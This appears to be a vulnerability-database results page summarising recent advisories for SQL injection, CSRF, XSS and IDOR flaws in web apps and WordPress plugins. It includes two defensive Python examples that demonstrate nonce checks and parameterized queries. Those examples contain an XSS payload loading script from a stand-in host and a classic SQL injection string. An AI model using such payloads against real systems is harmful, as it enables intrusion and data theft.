
1395 matches found

CNVD
added 2025/08/20 12:00 a.m. · 6 views

Online Medicine Guide /adphar.php File SQL Injection Vulnerability

Online Medicine Guide is an online medical guide. It suffers from a SQL injection vulnerability: the phuname parameter of the file /adphar.php is used in SQL statements without validation. The vulnerability can be exploited to execute illegal SQL...

CVSS 9.8 · AI score 8 · EPSS 0.00387
Exploits 1 · References 1
CNVD
added 2025/08/20 12:00 a.m. · 3 views

Travel Management System /updatepackage.php File SQL Injection Vulnerability

Travel Management System is a travel management system. It suffers from a SQL injection vulnerability: the s1 parameter of the file /updatepackage.php is used in SQL statements without validation. An attacker can exploit this vulnerability to execute...

CVSS 9.8 · AI score 8.3 · EPSS 0.00387
Exploits 1 · References 1
CNVD
added 2025/08/20 12:00 a.m. · 2 views

WordPress Add User Meta plugin Cross-Site Request Forgery Vulnerability

WordPress and WordPress plugins are products of the WordPress Foundation; a WordPress plugin is an application plugin. A cross-site request forgery vulnerability exists in the WordPress Add User Meta plugin, stemming from missing or incorrect nonce validation on the "add-user-meta...

CVSS 6.1 · AI score 6.8 · EPSS 0.00141
Exploits 0 · References 1
Cvelist
added 2025/08/19 7:06 p.m. · 9 views

CVE-2025-55737 flaskBlog arbitrary comment delete

flaskBlog is a blog app built with Flask. In 2.8.0 and earlier, when deleting a comment, there is no validation of the ownership of the comment. Any user can delete an arbitrary comment of another user on any post by intercepting the delete request and changing the commentID. The code...

CVSS 6.9 · EPSS 0.00274
Exploits 1 · References 1
OSV
added 2025/08/19 6:56 p.m. · 5 views

CVE-2025-55735 flaskBlog Stored XSS Vulnerability

flaskBlog is a blog app built with Flask. In 2.8.0 and earlier, when creating a post, there is no validation of the content of the post stored in the variable "postContent". The vulnerability arises when the content of the post is displayed through the | safe filter, which tells the template engine not to escap...

CVSS 5.3 · AI score 6.3 · EPSS 0.00192
Exploits 1 · References 3
Cvelist
added 2025/08/19 12:00 a.m. · 7 views

CVE-2025-51539

EzGED3 3.5.0 contains an unauthenticated arbitrary file read vulnerability due to improper access control and insufficient input validation in a script exposed via the web interface. A remote attacker can supply a crafted path parameter to a PHP script to read arbitrary files from the filesystem...

EPSS 0.00667
Exploits 1 · References 1
NVD
added 2025/08/18 2:15 p.m. · 14 views

CVE-2025-4962

An Insecure Direct Object Reference (IDOR) vulnerability was identified in the POST /v1/templates endpoint of the Lunary API, affecting versions up to 0.8.8. This vulnerability allows authenticated users to create templates in another user's project by altering the projectId query parameter. The ro...

CVSS 7.7 · EPSS 0.00217
Exploits 0 · References 2
Vulnrichment
added 2025/08/18 1:27 p.m. · 6 views

CVE-2025-4962 IDOR Vulnerability in Template Creation via `projectId` Manipulation in lunary-ai/lunary

An Insecure Direct Object Reference (IDOR) vulnerability was identified in the POST /v1/templates endpoint of the Lunary API, affecting versions up to 0.8.8. This vulnerability allows authenticated users to create templates in another user's project by altering the projectId query parameter. The ro...

CVSS 7.7 · AI score 6.8 · EPSS 0.00217
Exploits 0 · References 2
RedhatCVE
added 2025/08/18 4:31 a.m. · 9 views

CVE-2025-7683

The LatestCheckins plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1. This is due to missing or incorrect nonce validation on the 'LatestCheckins' page. This makes it possible for unauthenticated attackers to update settings and inject...

CVSS 6.1 · AI score 6.7 · EPSS 0.00159
Exploits 0 · References 1
CNNVD
added 2025/08/18 12:00 a.m. · 3 views

Ashlar-Vellum multiple products buffer error vulnerability

Ashlar-Vellum Xenon and others are products of Ashlar-Vellum. Xenon is CAD modeling software; Cobalt is a parametric computer-aided design and 3D modeling program; Argon is 2D drafting and 3D modeling software. A buffer error vulnerability exists i...

CVSS 8.4 · AI score 7.1 · EPSS 0.00158
Exploits 0 · References 2
RedhatCVE
added 2025/08/17 8:29 a.m. · 11 views

CVE-2025-7688

The Add User Meta plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the 'add-user-meta' page. This makes it possible for unauthenticated attackers to update settings and inject...

CVSS 6.1 · AI score 6.7 · EPSS 0.00141
Exploits 0 · References 1
NVD
added 2025/08/16 4:16 a.m. · 6 views

CVE-2025-7683

The LatestCheckins plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1. This is due to missing or incorrect nonce validation on the 'LatestCheckins' page. This makes it possible for unauthenticated attackers to update settings and inject...

CVSS 6.1 · EPSS 0.00159
Exploits 0 · References 3
Cvelist
added 2025/08/16 3:38 a.m. · 8 views

CVE-2025-7686 weichuncai(WP伪春菜) <= 1.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting

The weichuncai (WP伪春菜) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the sm-options.php page. This makes it possible for unauthenticated attackers to update settings and inject...

CVSS 6.1 · EPSS 0.00127
Exploits 0 · References 2
CNNVD
added 2025/08/16 12:00 a.m. · 4 views

WordPress plugin School Management System for Wordpress code issue vulnerability

WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform developed in PHP; it supports personal blog sites on PHP and MySQL servers. A WordPress plugin is an application plugin. A code issue vulnerability exists in...

CVSS 8.8 · AI score 6.9 · EPSS 0.00519
Exploits 0 · References 3
Positive Technologies
added 2025/08/16 12:00 a.m. · 5 views

PT-2025-33531 · WordPress · Linux Promotional Plugin For Wordpress

Name of the Vulnerable Software and Affected Versions: Linux Promotional Plugin for WordPress versions up to and including 1.4 Description: The Linux Promotional Plugin for WordPress is susceptible to Cross-Site Request Forgery due to missing or incorrect nonce validation on the...

CVSS 6.1 · AI score 6.3 · EPSS 0.00159
Exploits 0 · References 7
Cvelist
added 2025/08/15 2:24 a.m. · 8 views

CVE-2025-6025 Order Tip for WooCommerce <= 1.5.4 - Unauthenticated Tip Manipulation to Negative Value Leading to Unauthorized Discounts

The Order Tip for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Improper Input Validation in all versions up to, and including, 1.5.4. This is due to lack of server-side validation on the data-tip attribute, which makes it possible for unauthenticated attackers to apply an...

CVSS 7.5 · EPSS 0.00425
Exploits 0 · References 4
Tenable Nessus
added 2025/08/15 12:00 a.m. · 3 views

Linux Distros Unpatched Vulnerability : CVE-2019-11765

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - A compromised content process could send a message to the parent process that would cause the 'Click to Play' permission prompt to be shown. However, due to lac...

CVSS 6.5 · AI score 7.5 · EPSS 0.00844
Exploits 0 · References 2
Vulnrichment
added 2025/08/13 3:42 a.m. · 6 views

CVE-2025-8891 OceanWP <= 4.0.9 - 4.1.1 - Cross-Site Request Forgery to Ocean Extra Plugin Installation

The OceanWP theme for WordPress is vulnerable to Cross-Site Request Forgery in versions 4.0.9 to 4.1.1. This is due to missing or incorrect nonce validation on the oceanwpnoticebuttonclick function. This makes it possible for unauthenticated attackers to install the Ocean Extra plugin via a forge...

CVSS 4.3 · AI score 6.7 · EPSS 0.00191
Exploits 1 · References 3
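Seven entries on this page (Add User Meta, LatestCheckins, weichuncai, Linux Promotional Plugin, OceanWP and the two CNVD/NVD duplicates) share one root cause: a settings or install handler that accepts a state-changing request without checking the nonce tied to the victim's session, so an unauthenticated attacker's page can submit it on behalf of a logged-in administrator. The following is an added example, not WordPress's or any listed plugin's code: an action-bound nonce issued per session and verified in constant time before the handler touches state, written with Python's standard library. The secret, session identifier and request shape are assumptions.

```python
"""Added example (not WordPress or any listed plugin's code): a per-session,
per-action nonce checked before a settings update. SERVER_SECRET, the session
identifier and the form layout are assumptions made for the example."""
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)  # assumed per-deployment secret, kept server-side


def issue_nonce(session_id, action):
    """Derives a nonce bound to this session and this action, so a token
    taken from one form cannot be replayed against a different handler."""
    msg = f"{session_id}:{action}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def verify_nonce(session_id, action, supplied):
    """Recomputes the expected nonce and compares in constant time. A missing
    token, a token for another action or a token from another session fails."""
    if not supplied:
        return False
    return hmac.compare_digest(issue_nonce(session_id, action), supplied)


def update_settings_unchecked(session_id, form):
    """The vulnerable shape from the advisories: whatever request reaches the
    handler with a valid login cookie is applied, nonce or not."""
    return ("ok", form["value"])


def update_settings_checked(session_id, form):
    """The fixed shape: refuse before changing state unless the nonce matches."""
    if not verify_nonce(session_id, "update_settings", form.get("_nonce")):
        return ("forbidden", None)
    return ("ok", form["value"])


if __name__ == "__main__":
    victim = "sess-victim"  # the administrator's session; the browser attaches its cookie
    # Constructed forged request: the attacker's page cannot read the victim's
    # nonce, so the cross-site form carries only the payload it wants stored.
    forged = {"value": "<script src=//evil.example></script>"}
    print(update_settings_unchecked(victim, forged))  # ('ok', '<script ...'): setting injected
    print(update_settings_checked(victim, forged))    # ('forbidden', None)
    # Legitimate submission from the real settings page includes the issued nonce.
    legit = {"value": "safe", "_nonce": issue_nonce(victim, "update_settings")}
    print(update_settings_checked(victim, legit))     # ('ok', 'safe')
```

The property that matters is that the nonce is something the attacker's origin cannot obtain: it is derived from the victim's session and only ever embedded in pages served to that session. Binding it to the action name is what keeps a nonce leaked from a harmless form from being reused on the settings handler, which is the "incorrect nonce validation" variant the advisories group with the plain missing check.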
RedhatCVE
added 2025/08/13 12:11 a.m. · 7 views

CVE-2025-51823

libcsp 2.0 is vulnerable to Buffer Overflow in the cspethinit function due to improper handling of the ifname parameter. The function uses strcpy to copy the interface name into a structure member ctx-name without validating the input length...

CVSS 6.5 · AI score 7.2 · EPSS 0.00247
Exploits 0 · References 1
CNNVD
added 2025/08/13 12:00 a.m. · 2 views

Code-Projects Job Diary injection vulnerability

Job Diary is job diary software. It suffers from a SQL injection vulnerability: the jobtitle parameter of the file /user-apply.php is used in SQL statements without validation. An attacker can exploit this vulnerability to execute illegal SQL commands to...

CVSS 9.8 · AI score 8.2 · EPSS 0.00409
Exploits 1 · References 5
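The Online Medicine Guide (phuname in /adphar.php), Travel Management System (s1 in /updatepackage.php) and Job Diary (jobtitle in /user-apply.php) entries describe the same defect: a request parameter spliced into a SQL statement as text. The following is an added example, not code from any of those projects, which are PHP applications: the pattern is reproduced in Python with sqlite3 so it runs offline, with the parameterized form beside it. The table, the rows and the payload are constructed for the example.

```python
"""Added example (not code from any of the listed projects): a request
parameter concatenated into SQL, as the three advisories describe, beside the
bound-parameter form. Table, rows and payload are constructed."""
import sqlite3


def make_db():
    """Constructed sample table standing in for the applications' own schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "admin"), (2, "bob", "user")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """Builds the statement by string concatenation. The parameter value is
    parsed as SQL grammar, so a quote in it rewrites the WHERE clause."""
    sql = "SELECT id, username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, username):
    """Passes the value as a bound parameter. The driver sends it as data;
    the statement's structure is fixed before the value is seen."""
    sql = "SELECT id, username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Constructed payload: closes the quoted literal, then appends an always-true
# predicate, turning "WHERE username = 'x' OR '1'='1'" into a match for every row.
PAYLOAD = "x' OR '1'='1"


if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, PAYLOAD))  # both rows, including the admin
    print(lookup_fixed(conn, PAYLOAD))       # [] : nobody is literally named x' OR '1'='1
    print(lookup_fixed(conn, "alice"))       # [(1, 'alice', 'admin')]
```

The "lack of validation" wording in the advisories is the symptom, not the fix: filtering quotes out of phuname or s1 leaves other encodings and other parameters to find. Binding parameters removes the class entirely, because the value can no longer change the statement the database compiles.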